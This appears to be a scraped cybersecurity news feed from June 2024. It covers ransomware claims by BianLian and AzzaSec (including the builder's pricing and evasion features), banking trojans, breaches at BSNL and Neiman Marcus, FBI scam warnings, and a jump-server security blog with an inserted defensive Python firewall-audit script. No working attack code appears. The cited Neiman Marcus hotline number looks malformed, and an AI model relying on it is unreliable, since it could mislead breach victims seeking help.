Identity Crime Reports Drop 16% Annually but Job Scams Surge
Buying a VPN? Here’s what to know and look for
Cybersecurity News and Magazine
BianLian Ransomware Targets Better Business Bureau, US Dermatology Partners
BianLian Ransomware Attack: Critical Details
The first organization targeted by hackers was Better Business Bureau (BBB), which is a private, nonprofit organization founded in 1912 in Arlington, Virginia. The firm maintains a massive database of accredited and non-accredited businesses, providing ratings based on several factors. The Better Business Bureau has a revenue of $430.6 Million.
Potential Impact of BianLian Ransomware Attack
If proven, the potential consequences of this ransomware attack could be critical as the accounting and financial details of both these firms could be leaked. The organizations should take appropriate measures to protect the privacy and security of the stakeholders involved. Financial data breaches can lead to identity theft, financial fraud, and a loss of trust among clients, potentially jeopardizing the company’s standing in the industry. Currently, details regarding the extent of the BianLian ransomware attack, data compromise, and the motive behind the cyber assault remain undisclosed. Despite the claims made by BianLian, the official websites of the targeted companies remain fully functional. This discrepancy has raised doubts about the authenticity of the BianLian group’s assertion. To ascertain the veracity of the claims, The Cyber Express has reached out to the officials of the affected organizations. As of the writing of this news report, no response has been received, leaving the ransomware attack claim unverified.
History of BianLian Ransomware Group Attacks
BianLian, a ransomware group, has been targeting critical infrastructure sectors in the U.S. and Australia since June 2022. They exploit RDP credentials, use open-source tools for discovery, and exfiltrate data via FTP or Rclone for extortion. FBI, CISA, and ACSC advise implementing mitigation strategies to prevent ransomware attacks. Initially employing a double-extortion model, they shifted to exfiltration-based extortion by 2023. According to a report by BlackBerry, BianLian ransomware showcases exceptional encryption speed and is coded in the Go programming language (Golang). This sophisticated approach has enabled the group to strike multiple organizations, leaving a trail of unverified claims in its wake.
Earlier in 2024, the group targeted companies such as North Star Tax and Accounting, KC Pharmaceuticals, and Martinaire. In its attack on MOOver, the group claimed to have accessed a staggering 1.1 terabytes of the firm’s data. Subsequently, Northeast Spine and Sports Medicine also found themselves on the list of victims. All these claims, similar to the recent attack, remain unverified.
Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
CISO2CISO.COM & CYBER SECURITY GROUP
US DHS Warns of AI-Fueled Chemical and Biological Threats – Source: www.databreachtoday.com
Source: www.databreachtoday.com – Author: 1 Artificial Intelligence & Machine Learning , Cyberwarfare / Nation-State Attacks , Fraud Management & Cybercrime New Report Urges Public-Private Collaboration to Reduce Chemical, Nuclear AI Risks Chris Riotta (@chrisriotta) • June 25, 2024 The U.S. federal government warned that artificial intelligence lowers the barriers to conceptualizing and conducting […]
The entry US DHS Warns of AI-Fueled Chemical and Biological Threats – Source: www.databreachtoday.com was published first on CISO2CISO.COM & CYBER SECURITY GROUP.
CISO2CISO.COM & CYBER SECURITY GROUP
Patched Weeks Ago, RCE Bug in AI Tool Still a ‘Probllama’ – Source: www.databreachtoday.com
Source: www.databreachtoday.com – Author: 1 Artificial Intelligence & Machine Learning , Governance & Risk Management , Next-Generation Technologies & Secure Development Companies Eager for Tools Are Putting AI’s Transformative Power Ahead of Security Rashmi Ramesh (rashmiramesh_) • June 25, 2024 Oh, no – not all Ollama administrators have patched against the “Probllama” flaw. […]
The entry Patched Weeks Ago, RCE Bug in AI Tool Still a ‘Probllama’ – Source: www.databreachtoday.com was published first on CISO2CISO.COM & CYBER SECURITY GROUP.
CISO2CISO.COM & CYBER SECURITY GROUP
Why New Cyber Penalties May Strain Hospital Resources – Source: www.databreachtoday.com
Source: www.databreachtoday.com – Author: 1 Healthcare , Industry Specific , Standards, Regulations & Compliance John Riggi of the American Hospital Association on HHS’ Upcoming Cyber Regulations Marianne Kolbasuk McGee (HealthInfoSec) • June 25, 2024 John Riggi, national cybersecurity and risk adviser, American Hospital Association White House efforts to ratchet up healthcare sector cybersecurity […]
The entry Why New Cyber Penalties May Strain Hospital Resources – Source: www.databreachtoday.com was published first on CISO2CISO.COM & CYBER SECURITY GROUP.
CISO2CISO.COM & CYBER SECURITY GROUP
Luxury Retailer Neiman Marcus Suffers Snowflake Breach – Source: www.databreachtoday.com
Source: www.databreachtoday.com – Author: 1 3rd Party Risk Management , Cybercrime , Fraud Management & Cybercrime More Victims of Campaign Against Data Warehousing Platform Snowflake Come to Light Mathew J. Schwartz (euroinfosec) • June 25, 2024 Attention Neiman Marcus shoppers: Your contact information may be for sale on a criminal forum. (Image: Shutterstock) […]
The entry Luxury Retailer Neiman Marcus Suffers Snowflake Breach – Source: www.databreachtoday.com was published first on CISO2CISO.COM & CYBER SECURITY GROUP.
CISO2CISO.COM & CYBER SECURITY GROUP
Securing Data With Immutable Backups and Automated Recovery – Source: www.databreachtoday.com
Source: www.databreachtoday.com – Author: 1 Immutable backups are essential in the fight against ransomware, and businesses should put protections in place to ensure attackers can’t alter or delete them. Acronis President Gaidar Magdanurov said data protection firms must address the threat of ransomware by implementing immutable storage and exposing APIs for seamless integration with security […]
The entry Securing Data With Immutable Backups and Automated Recovery – Source: www.databreachtoday.com was published first on CISO2CISO.COM & CYBER SECURITY GROUP.
Malwarebytes Premium stops 100% of malware during AV Lab test
Malwarebytes Premium has maintained its long-running, perfect record in protecting users against online threats by blocking 100% of the malware samples deployed in the AV Lab Cybersecurity Foundation’s “Advanced In-The-Wild Malware Test.”
For its performance in the May 2024 evaluation, Malwarebytes Premium also received a certificate of “Excellence.”
According to AV Lab, such certificates “are granted to solutions that are characterized by a high level of security, with a rating of at least 99% of blocked threats in the Advanced In-The-Wild Malware Test.”
Every two months, the cybersecurity and information security experts at AV Lab construct a series of tests to compare cybersecurity vendors against the latest malware that is currently being used by adversaries and threat actors.
For the May evaluation, AV Lab tested 521 unique malware samples against 13 cybersecurity products. Malwarebytes Premium Security detected 521/521 malware samples, with a remediation time of 44 seconds—well below the 52-second average determined by AV Lab in its most recent testing.
Three cybersecurity vendors failed to block 100% of malware tested: ESET, F-Secure, and Panda.
To ensure that AV Lab’s evaluations reflect current cyberthreats, each round of testing follows three steps:
- Collecting and verifying in-the-wild malware: AVLab regularly collects malware samples from malicious and active URLs, testing the malware samples to understand their impact on networks and endpoints.
- Simulating a real-world scenario in testing: To recreate how a real-life cyberattack would occur, AVLab uses the Firefox web browser to engage with the known, malicious URLs collected in the step prior. In the most recent test, AVLab emphasized the potential for these URLs to be sent over instant messaging platforms, including Discord and Telegram.
- Incident recovery time assessment: With the various cybersecurity products installed, AVLab measures whether the evaluated product detects a malware sample, when it detects a sample, and how long it took to detect that sample. The last metric is referred to as “Remediation Time.”
Malwarebytes is proud to once again achieve a 100% score with AVLab’s Advanced In-The-Wild Malware Test, a trusted resource that proves our commitment to user safety.
Dark Web Actors Reveal New Banking Trojan Sniffthem
Technical Insights into Sniffthem Banking Trojan
Sniffthem's technical specifications highlight its sophistication and potential impact on cybersecurity. The Sniffthem banking trojan operates persistently as a hidden process, evading detection and maintaining a covert presence on infected systems. Its integration with a web-based management panel allows threat actors to efficiently control compromised devices and orchestrate malicious activities remotely. Furthermore, Sniffthem's compatibility with a wide array of browsers—64 in total—highlights its versatility and ability to infiltrate diverse user environments. This capability extends its reach across various sectors, with a particular focus on the BFSI (Banking, Financial Services, and Insurance) industry where financial transactions and sensitive data are prime targets.
The emergence of Sniffthem signifies a heightened threat to organizations and individuals alike, particularly within the financial sector. To mitigate risks associated with banking trojans like Sniffthem, cybersecurity best practices are essential. Organizations should prioritize regular software updates, endpoint protection, and employee training to recognize and respond to phishing attempts effectively.
Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
Cybersecurity News and Magazine
BSNL Data Breached Yet Again? Millions of Users Face Risk of SIM Card Cloning, Financial Fraud
Exploring Claims of BSNL Data Breach
The BSNL data leak was first disclosed by an Indian firm, Athenian Tech, in its threat intelligence report. According to the report, a threat actor, operating under the alias “kiberphant0m”, leaked a significant amount of sensitive data affecting millions of users. The threat actor posted this information on the data hack site BreachForums and shared samples of the breach to legitimize the claim. Overall, around 278GB of sensitive information could be compromised.
Potential Implications of BSNL Data Breach
- SIM Cloning and Identity Theft: Cloning a SIM involves creating a duplicate card that has the same IMSI and authentication keys, thus making it easy for the attackers to intercept messages/ calls, gain access to people’s bank accounts, and embezzle their finances.
- Privacy Violations: Identity theft enables unauthorized access to individuals’ communications and further breaches of their privacy.
- Financial and Identity Theft: Illegal operations can defeat protective procedures in the financial portfolios, which entail substantial monetary losses and cases of identity theft.
- Targeted Attacks and Scams: The user could be exposed to major security risks and could be vulnerable to phishing schemes and other social engineering attacks, exploiting their trust in BSNL.
Second BSNL Data Breach in Less Than Six Months
If the data theft claims are proven, it would be the second instance of a cyberattack on BSNL in less than six months. In December 2023, a threat actor known as “Perell” claimed access to critical information about fiber and landline users of BSNL. The dataset contained about 32,000 lines of data allegedly impacting over 2.9 million users. However, BSNL did not validate the claims back then.
Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
The US Is Banning Kaspersky
This move has been coming for a long time.
The Biden administration on Thursday said it’s banning the company from selling its products to new US-based customers starting on July 20, with the company only allowed to provide software updates to existing customers through September 29. The ban—the first such action under authorities given to the Commerce Department in 2019—follows years of warnings from the US intelligence community about Kaspersky being a national security threat because Moscow could allegedly commandeer its all-seeing antivirus software to spy on its customers.
'ChamelGang' APT Disguises Espionage Activities With Ransomware
Siemens Sicam Vulnerabilities Could Facilitate Attacks on Energy Sector
Several vulnerabilities patched recently in Siemens Sicam products could be exploited in attacks aimed at the energy sector.
The post Siemens Sicam Vulnerabilities Could Facilitate Attacks on Energy Sector appeared first on SecurityWeek.
Exploitation Attempts Target New MOVEit Transfer Vulnerability
Exploitation attempts targeting CVE-2024-5806, a critical MOVEit Transfer vulnerability patched recently, have started.
The post Exploitation Attempts Target New MOVEit Transfer Vulnerability appeared first on SecurityWeek.
FireTail Unveils Free Access for All to Cutting-Edge API Security Platform
McLean, United States of America, 26th June 2024, CyberNewsWire
The post FireTail Unveils Free Access for All to Cutting-Edge API Security Platform appeared first on Security Boulevard.
Security Boulevard
Stepping Into the Attacker’s Shoes: The Strategic Power of Red Teaming (Insights from the Field)
Red Teaming security assessments aim to demonstrate to clients how attackers in the real world might link together various exploits and attack methods to reach their objectives.
The post Stepping Into the Attacker’s Shoes: The Strategic Power of Red Teaming (Insights from the Field) appeared first on Security Boulevard.
EU Opens the App Store Gates: A Call to Arms for MDM Implementation
By introducing a mobile device management (MDM) platform into the existing infrastructure, administrators gain the ability to restrict sideloading on managed devices.
The post EU Opens the App Store Gates: A Call to Arms for MDM Implementation appeared first on Security Boulevard.
Understanding and Mitigating Jump Server Security Risks
Many organizations today use a jump server (also known as jump box or jump host) as the intermediary device to access a remote network securely. It is the go-to solution for remote administration of servers and devices and for development and testing environments. It is also commonly used to control vendor access to an organization’s internal systems and to meet compliance in certain industries.
While this is definitely a step up in security from using VPNs, a jump server can sometimes create a false sense of security, because security risks and loopholes still exist.
In this blog post, we will first explore the security benefits and risks of a jump server, and then outline strategies to mitigate those security risks.
TABLE OF CONTENTS
Top 5 Security Benefits of a Jump Server
Top 5 Security Risks of a Jump Server
How to Mitigate Jump Server Security Risks Using Best Practices
Mamori Adds Two Additional Layers of Security to Your Jump Host
Top 5 Security Benefits of a Jump Server
1. Central Access Point for Easy Management
When access is centralized, it is easy to monitor and manage who accesses the network, ensuring that all access to protected networks is authorized. Centralized access also simplifies managing permissions and security policies, while also making it easier to monitor and log activities.
2. Easy Monitoring and Session Management
With centralized access, monitoring traffic and logging activities are simplified. Jump servers also allow session recording, session timeout, and the ability to terminate sessions to enhance control and security.
3. Reduced Attack Surface from External Threats
Jump servers should be isolated from the internet and shouldn’t be able to browse the intranet. This reduces the attack surface and adds a layer of defense against external threats.
4. Reduced Exposure
By limiting direct access to critical systems and databases, jump servers minimize the risk of unauthorized access.
5. Simplifying Audit and Compliance
User activity and traffic passing through the controlled central access point can be logged and recorded, which helps meet regulatory requirements.
Top 5 Security Risks of a Jump Server
1. Single Point of Failure
A compromised jump server can jeopardize the entire network. Also, a compromised user account, a privileged user, or an infected device can jeopardize the entire system and database the jump server protects.
2. Setup Complications
A simple jump server consists of a Windows Server with RDP and user accounts from Active Directory. Additional setup and tools can be used to create more secure policies. In some cases, coding and debugging are required, which makes it difficult to add additional security policies.
3. Misconfigured Architecture and Database Security
A misconfigured architecture can completely bypass the jump server and access privileged resources, as indicated in the image below with the non-privileged resource. If the non-privileged resource is compromised, then the privileged resource can be accessed, bypassing the jump server. Because privileged resources are usually databases, many mistakenly think that jump server protects the database. Although jump servers do protect database access (in a way), it is NOT database security, as you’ll see later in this article.
Above: Workstation can circumvent access to privileged resources when the security architecture is misconfigured. Image source: Improsec.
4. Outdated Software and Credentials Management
Running outdated software on the jump server is known to expose the jump server to vulnerabilities. Default and weak passwords should be changed, and strong authentication policies should be enforced.
5. Insider Threats and Incident Response
Disgruntled or malicious employees who have access can cause data loss and data breaches. Although all traffic can be monitored, jump servers by default lack the ability to respond immediately to insiders who are mass downloading or deleting data.
How to Mitigate Jump Server Security Risks Using Best Practices
Simply put, the easiest and simplest way to mitigate jump server security risks is to implement security best practices on your jump server. However, that is easier said than done.
Here at Mamori.io, we make it extremely easy to implement jump server security best practices (including ransomware prevention and cybersecurity best practices).
Below lists the jump server security best practices and how they mitigate the security risks mentioned earlier.
1. Implement Two-Factor Authentication (2FA)
2FA adds another layer of security even when your password is compromised, or if you’re using a default password.
Security Risk Mitigated: Credentials Management, Database Security
Mamori’s Approach: Mamori.io uses a zero-trust approach that assumes your password has already been compromised. Every access is secured by MFA, from accessing the network using Zero Trust Network Access (ZTNA) to accessing the database using our Database Privileged User Access (DB PAM) via SSO. Even certain operations within the database, such as mass deleting data, can be authorized to certain individuals and secured using 2FA.
2. Regular Updates and Patching
Regularly patching and updating the software and operating system on the jump server is the quickest and easiest way to close security gaps against known vulnerabilities and exploits.
Security Risk Mitigated: Outdated Software
Mamori’s Approach: Even if an external threat uses a known vulnerability to compromise your jump server, your critical resources and database can still be protected by database privileged access controls secured by 2FA.
3. Enforce Role-Based Access
Only grant access to those who need access. Enforce role-based access so users have the minimal necessary permissions (least-privileged access). This limits the number of potential attack vectors and reduces insider threats.
Security Risk Mitigated: Setup Complications, Misconfigured Architecture and Database Security, Insider Threats
Mamori’s Approach: Mamori provides Privileged Access Management (PAM) to limit jump server access to only those who need it. Once the user connects to the database or privileged resource, Mamori provides Database Privileged Access Management (DB PAM) to limit the user’s access to resources, their visibility (e.g. data masking), and the types of operations (e.g. read, write, delete, etc.) the user can perform on those resources.
4. Ensure Comprehensive Logging and Monitoring
Comprehensive logging and monitoring allow for the detection of suspicious activities and help with IT audits and compliance. Logging and monitoring also facilitate forensic analysis post-incident, enhancing the overall security posture.
Security Risk Mitigated: Insider Threats, Incident Response
Mamori’s Approach: At Mamori, we believe logging and monitoring is NOT comprehensive if users are able to share accounts. That is why we use a zero-trust approach, where the user, device, location (and more) need to be authenticated for access and for certain database operations. Thus, when each session is monitored, logged, and recorded, we ensure that each session can easily be traced back to an individual and used for forensics or incident response.
5. Enforce Strong Password Policies
Strong password policies, such as password complexity, regular changes, and restricting reuse, make it harder for attackers to guess or crack passwords. This strengthens the first line of defense against unauthorized access.
Security Risk Mitigated: Credentials Management and weak passwords
Mamori’s Approach: We encourage the use of strong password policies, but we emphasize Two-Factor Authentication (2FA). That’s because we use a zero-trust approach, where we assume every password is already compromised or will be compromised one day.
6. Segmenting the Network
Jump servers should only have access to select servers. One practice is to isolate the jump server from other parts of the network, which limits the potential damage if the jump server is compromised. Segmenting a network prevents attacks from moving laterally across the network to access other critical systems.
Security Risk Mitigated: Setup Complications, Misconfigured Architecture
Mamori’s Approach: Mamori uses Zero Trust Network Access (ZTNA) to microsegment a network. The microsegmented network can then be used for the jump server to ensure an isolated, secure environment.
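As an added illustration of the bypass path described under risk 3 and the segmentation practice above (example code written for this page, not from the article or from Mamori.io): a Python audit over a constructed firewall rule set that checks whether any zone other than the jump host can reach the privileged database zone, either directly or through a non-privileged intermediate such as an application server. The zone names, addresses, rule syntax, and the database port 1433 are all assumptions made for the example.

```python
"""Audit firewall rules for the jump-server bypass path.

Constructed example: models zones and first-match firewall rules, then
reports every zone (other than the jump host) that can reach the privileged
database zone directly or via one intermediate zone.
"""
from dataclasses import dataclass
from ipaddress import IPv4Address, IPv4Network, ip_network
from typing import Dict, List, Set


@dataclass(frozen=True)
class Rule:
    action: str        # "allow" or "deny"
    src: IPv4Network
    dst: IPv4Network
    port: int          # 0 means any port


# Constructed zones; the addressing is hypothetical.
ZONES: Dict[str, IPv4Network] = {
    "workstations": ip_network("10.10.0.0/24"),
    "jump":         ip_network("10.20.0.10/32"),   # the jump host
    "app":          ip_network("10.30.0.0/24"),    # non-privileged resource
    "databases":    ip_network("10.40.0.0/24"),    # privileged resource
}
PRIVILEGED, JUMP = "databases", "jump"
PROBE_PORT = 65535   # port used to exercise "any port" rules


def _cidr(text: str) -> IPv4Network:
    return ip_network("0.0.0.0/0" if text == "any" else text)


def parse_rules(text: str) -> List[Rule]:
    """Parse one rule per line: '<allow|deny> <src> <dst> <port|any>'."""
    rules = []
    for raw in text.strip().splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        action, src, dst, port = line.split()
        if action not in ("allow", "deny"):
            raise ValueError(f"bad rule: {raw}")
        rules.append(Rule(action, _cidr(src), _cidr(dst),
                          0 if port == "any" else int(port)))
    return rules


def permitted(rules: List[Rule], src: IPv4Address, dst: IPv4Address, port: int) -> bool:
    """First-match evaluation; no matching rule means implicit deny."""
    for r in rules:
        if src in r.src and dst in r.dst and r.port in (0, port):
            return r.action == "allow"
    return False


def allowed_ports(rules: List[Rule], src: IPv4Address, dst: IPv4Address) -> Set[int]:
    """Ports on which src may reach dst; 0 in the result means every port."""
    candidates = {r.port for r in rules if src in r.src and dst in r.dst}
    return {p for p in candidates if permitted(rules, src, dst, p or PROBE_PORT)}


def probe(zone: str) -> IPv4Address:
    """A representative host address inside the zone."""
    net = ZONES[zone]
    return net.network_address if net.prefixlen == 32 else net.network_address + 1


def zone_reachable(rules: List[Rule], src_zone: str, dst_zone: str, port: int = None) -> bool:
    ports = allowed_ports(rules, probe(src_zone), probe(dst_zone))
    return bool(ports) if port is None else (port in ports or 0 in ports)


def audit(rules: List[Rule], db_port: int = 1433) -> List[str]:
    """Flag every non-jump zone that can reach the privileged zone directly
    or through one intermediate zone (the misconfiguration in risk 3)."""
    findings = []
    others = [z for z in ZONES if z not in (PRIVILEGED, JUMP)]
    for z in others:
        if zone_reachable(rules, z, PRIVILEGED, db_port):
            findings.append(f"{z} can reach {PRIVILEGED} directly, bypassing {JUMP}")
        for mid in others:
            if mid != z and zone_reachable(rules, z, mid) \
                    and zone_reachable(rules, mid, PRIVILEGED, db_port):
                findings.append(f"{z} can reach {PRIVILEGED} via {mid}, bypassing {JUMP}")
    return findings


# Constructed rule sets: the app tier is allowed to talk to the databases,
# so a compromised app server lets a workstation bypass the jump host.
MISCONFIGURED = """
allow 10.10.0.0/24  10.20.0.10/32 3389   # workstations -> jump host (RDP)
allow 10.20.0.10/32 10.40.0.0/24  1433   # jump host -> databases
allow 10.10.0.0/24  10.30.0.0/24  443    # workstations -> app server
allow 10.30.0.0/24  10.40.0.0/24  1433   # app server -> databases (bypass path)
deny  any           any           any
"""

HARDENED = """
allow 10.10.0.0/24  10.20.0.10/32 3389
allow 10.20.0.10/32 10.40.0.0/24  1433
allow 10.10.0.0/24  10.30.0.0/24  443
deny  10.30.0.0/24  10.40.0.0/24  any    # app tier never reaches databases directly
deny  any           any           any
"""

if __name__ == "__main__":
    for name, text in (("misconfigured", MISCONFIGURED), ("hardened", HARDENED)):
        print(name, audit(parse_rules(text)) or ["no bypass paths found"])
```

The audit deliberately checks one intermediate hop rather than only direct rules, because that is exactly the path the article warns about: the workstation never touches the database directly, but the non-privileged resource it can reach does. Running the same check after every firewall change turns the segmentation practice into a repeatable control rather than a one-time design decision.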
Mamori Adds Two Additional Layers of Security to Your Jump Host
Layer 1: Securing Access to the Jump Server
Mamori ensures that only the right user with the right permission has access to the jump server using the following modules and features:
Zero Trust Network Access (ZTNA) – Before a user connects to the network, the user’s device and identity are verified using 2FA. Other security policies, such as access restrictions by IP address, can also be enforced.
Privileged Access Management (PAM) – Once a user connects to the network, policies set forth in the PAM module will restrict or allow that user’s access to the jump server.
Layer 2: Securing Access from the Jump Server to Your Databases
After a person connects to a jump server, the following Mamori modules and features ensure that the person can only view, access, and perform the operations needed to do their job:
Database Privileged Access Management (DB PAM) – Once a user connects to a database via a jump server, DB PAM will determine what resources the user has access to and what database operations the user can execute.
SQL Firewall – DB PAM can create rules and privileges on what SQL commands a user can run. You can choose to block all SQL commands or allow specific types of SQL commands.
Data Privacy Policies – You can easily create policies such as data masking policies, who has access to which tables, rows, or columns, and how users can work with those data.
Bonus Layer: Controlling Uploads and Downloads from Jump Server
By default, jump servers do not allow you to control uploads and downloads to and from the jump server. When someone needs to upload or download, admins might choose to share passwords, or create a new account with excess privileges that later becomes a forgotten account; both of these introduce considerable security risks.
With Mamori’s PAM features, you can set permissions that specify which users are able to upload, download, or do both from the jump server. Permissions include having the user request access on demand, limiting access by IP address, or setting a time frame during which the user account is granted access. This is another form of securing access that improves both security and workflow efficiency.
Deploy Both Layers Using a Simple Dashboard with No Coding Required
Unlike configuring a jump server, using Mamori requires no coding. We offer a simple dashboard and user interface through which even the most non-technical users can create security policies that mitigate the security risks of your jump server.
Conclusion
By understanding the benefits and addressing the risks associated with jump servers, you can enhance the security of your network while maintaining efficient, controlled, and secure access to critical systems. If you have further questions or need assistance in securing your jump server, feel free to reach out for a detailed consultation.
Schedule a demo with Mamori.io or request your free trial. If you’re a small business with fewer than 20 users, you can use Mamori.io for free.
The post Understanding and Mitigating Jump Server Security Risks appeared first on Security Boulevard.
Efficiency is Key to Cybersecurity in the Post-Cloud Era
SANTA CLARA, Calif., June 26, 2024 — At the 16th Information Security Forum and 2024 RSAC Hot Topics Seminar held on June 7, 2024, Richard Zhao, Chief Operating Officer of International Business at NSFOCUS, presented the new picture of cybersecurity in the post-cloud era with his professional insights. Key Highlights Richard’s speech focused on three […]
The post Efficiency is Key to Cybersecurity in the Post-Cloud Era appeared first on NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks.
The post Efficiency is Key to Cybersecurity in the Post-Cloud Era appeared first on Security Boulevard.
Snowflake Breach
Snowflake has become the latest corporate victim in a cyberattack, but how it is playing out is a little different than many breaches.
The post Snowflake Breach appeared first on Security Boulevard.
Proxies as a Service: How to Identify Proxy Providers via Bots as a Service
See how DataDome learns about proxy networks from bots as a service, how BaaS can be detected, and what kind of IP addresses are behind BaaS.
The post Proxies as a Service: How to Identify Proxy Providers via Bots as a Service appeared first on Security Boulevard.
Chinese and N. Korean Hackers Target Global Infrastructure with Ransomware
Practical Guidance For Securing Your Software Supply Chain
Fake Law Firms Con Victims of Crypto Scams, Warns FBI
Apple Patches AirPods Bluetooth Vulnerability That Could Allow Eavesdropping
New Credit Card Skimmer Targets WordPress, Magento, and OpenCart Sites
New Medusa Android Trojan Targets Banking Users Across 7 Countries
Cybersecurity News and Magazine
AzzaSec Reveals Advanced Windows Ransomware Builder, Threatens Cybersecurity
AzzaSec Announces New Windows Ransomware Builder
Features and Functionality of the Windows Ransomware Builder
In their Telegram post, AzzaSec described their ransomware's capabilities in detail. Developed with VB.NET and weighing 10MB, the ransomware utilizes a unique algorithm for encryption. It operates with a fully undetectable structure, boasting a detection rate of only 1 out of 40 on KleenScan. Tested against various security solutions including Windows Defender, Avast, Kaspersky, and AVG, AzzaSec ensures its malware's effectiveness in compromising systems. The ransomware functions by connecting to a C2 server, where decryption keys and device information are stored. This approach allows the threat actors to monitor and control the ransomware's impact remotely. Furthermore, the ransomware includes anti-virtual machine, anti-debugging, and anti-sandbox features, making it resilient against common security countermeasures.
AzzaSec also outlined its pricing strategy: $300 for a single-use stub, escalating to $4500 for a six-month subscription. For those seeking full control, the source code is available for $8000, enabling other threat actors to customize and deploy the ransomware independently.
AzzaSec's emergence into the ransomware scene signals a reminder for organizations and individuals alike to upgrade their cybersecurity measures and remain vigilant against online threats. As ransomware-as-a-service models become more accessible, preemptive cybersecurity measures and incident response plans are essential defenses against these ever-present dangers.
Don’t Fall for Fake Recovery: FBI Warns of Cryptocurrency Scam
Cryptocurrency Scam: Emerging Criminal Tactic
The FBI's announcement aims to inform the public about a new criminal tactic designed to exploit cryptocurrency scam victims further. Using social media and other messaging platforms, fraudsters posing as lawyers from fictitious law firms are contacting scam victims and offering their services. These "lawyers" claim they have the authority to investigate fund recovery cases and often assert that they are working with, or have received information from, the FBI, Consumer Financial Protection Bureau (CFPB), or other government agencies to validate their legitimacy. In some instances, victims have reached out to these scammers through fake websites that appear legitimate, hoping to recover their lost funds. The scammers use various methods to further the recovery scam, including:
- Verification Requests: They ask victims to verify their identities by providing personal identifying information or banking details.
- Judgment Amount Requests: They request that victims provide a judgment amount they are seeking from the initial fraudster.
- Upfront Fees: They demand a portion of the fees upfront, with the balance due upon recovery of the funds.
- Additional Payments: They direct victims to make payments for back taxes and other fees purportedly necessary to recover their funds.
- Credibility Building: They reference actual financial institutions and money exchanges to build credibility and further their schemes.
Tips to Protect Yourself
The FBI offers several tips to help individuals protect themselves from falling victim to these scams:
- Be Wary of Advertisements: Be cautious of advertisements for cryptocurrency recovery services. Research the advertised company thoroughly and be suspicious if the company uses vague language, has a minimal online presence, and makes unrealistic promises about its ability to recover funds.
- Do Not Release Information: If an unknown individual contacts you claiming to be able to recover stolen cryptocurrency, do not release any financial or personal identifying information, and do not send money.
- No Fees from Law Enforcement: Remember that law enforcement does not charge victims a fee for investigating crimes. If someone claims an affiliation with the FBI, contact your local FBI field office to confirm their legitimacy.
Victim Reporting
The FBI urges victims to file a report with the Internet Crime Complaint Center. When filing a report, try to include the following information:
- Contact Information: Details about how the individual initially contacted you and how they identified themselves, including name, phone number, address, email address, and username.
- Financial Transaction Information: Details such as the date, type of payment, amount, account numbers involved (including cryptocurrency addresses), name and address of the receiving financial institution, and receiving cryptocurrency addresses.
Cybersecurity News and Magazine
- Cyble Recognized in Attack Surface Management Solutions Landscape Report
Key Capabilities of Cyble Vision X include:
- Attack Surface Management: Ensures digital security by identifying and mitigating threats.
- Brand Intelligence: Comprehensive protection against online brand abuse, including brand impersonation, phishing, and fraudulent domains.
- Cyber Threat Intelligence: Helps organizations gain insights and enhance their defense with AI-driven analysis and continuous threat monitoring.
- Dark Web and Cyber Crime Monitoring: Helps organizations stay vigilant and ahead of cybercriminals.
- Third-Party Risk Management (TPRM): Helps organizations identify, assess, and mitigate risks that may arise from a business's interactions with third parties.
Cybersecurity News and Magazine
- Neiman Marcus Alerts Customers After Data Breach Exposes Information of 64,472 Individuals
Neiman Marcus Data Breach Confirmed
The Neiman Marcus data breach compromised a range of personal data, including customer names, contact details, dates of birth, and Neiman Marcus gift card numbers. "Based on our investigation, the unauthorized party obtained certain personal information stored in the platform," the spokesperson continued, clarifying that "The types of personal information affected varied by individual, and included information such as name, contact information, date of birth, and Neiman Marcus or Bergdorf Goodman gift card numbers (but without gift card PINs)."

Neiman Marcus has acted swiftly, launching an investigation with leading cybersecurity experts and notifying law enforcement authorities. In compliance with regulatory requirements, the company has begun notifying affected customers, including reaching out to the Maine Attorney General's office. The retailer has advised customers to monitor their financial statements for any suspicious activity and has provided resources for individuals concerned about identity theft.

Mitigation Against the Neiman Marcus Data Leak
"We also began an investigation with assistance from leading cybersecurity experts and notified law enforcement authorities," the spokesperson emphasized. Customers are encouraged to request free credit reports, report any suspected fraud to law enforcement and the Federal Trade Commission, and consider placing a security freeze on their credit files as precautionary measures.

Neiman Marcus Group, Inc., based in Dallas, Texas, is a popular luxury retailer that oversees brands such as Neiman Marcus, Bergdorf Goodman, Horchow, and Last Call. Since September 2021, it has been under the ownership of a consortium of investment firms led by Davidson Kempner Capital Management, Sixth Street Partners, and Pacific Investment Management. Following this Neiman Marcus data leak, the firm has established a dedicated toll-free hotline (1-885-889-2743) for affected customers seeking further information or assistance related to the data breach incident.

Over 110,000 Websites Affected by Hijacked Polyfill Supply Chain Attack
SANS ISC InfoSec News Feed
- ISC Stormcast For Wednesday, June 26th, 2024 https://isc.sans.edu/podcastdetail/9036, (Wed, Jun 26th)
Risk and Privacy FREE BOOK
The importance of businesses being ‘operationally resilient’ is becoming increasingly important, and a driving force behind whether an organization can ensure that its valuable business operations can ‘bounce back’ from or manage to evade impactful occurrences is its security risk management capabilities.In this book, we change the perspective on an organization’s operational resilience capabilities so […]
The post Risk and Privacy FREE BOOK appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.
Risk Framework Body Related Data (PD) Immersive Tech
The content you are trying to access is private only to member users of the site. You must have a free membership at CISO2CISO.COM to access this content. You can register for free. Thank you. The CISO2CISO Advisors Team.
The post Risk Framework Body Related Data (PD) Immersive Tech appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.
CISO2CISO.COM & CYBER SECURITY GROUP
- CYBERSECURITY Improvements Needed in Addressing Risks to Operational Technology
The National Institute of Standards and Technology (NIST) describes OT as a broad range of programmable systems and devices that interact with the physical environment (or manage devices that interact with the physical environment). These systems and devices detect or cause a direct change through monitoring and/or control of devices, processes, and events. Figure 1 […]
The post CYBERSECURITY Improvements Needed in Addressing Risks to Operational Technology appeared first on CISO2CISO.COM & CYBER SECURITY GROUP.
Remote ID Proofing Good Practices
The content you are trying to access is private only to member users of the site. You must have a free membership at CISO2CISO.COM to access this content. You can register for free. Thank you. The CISO2CISO Advisors Team.
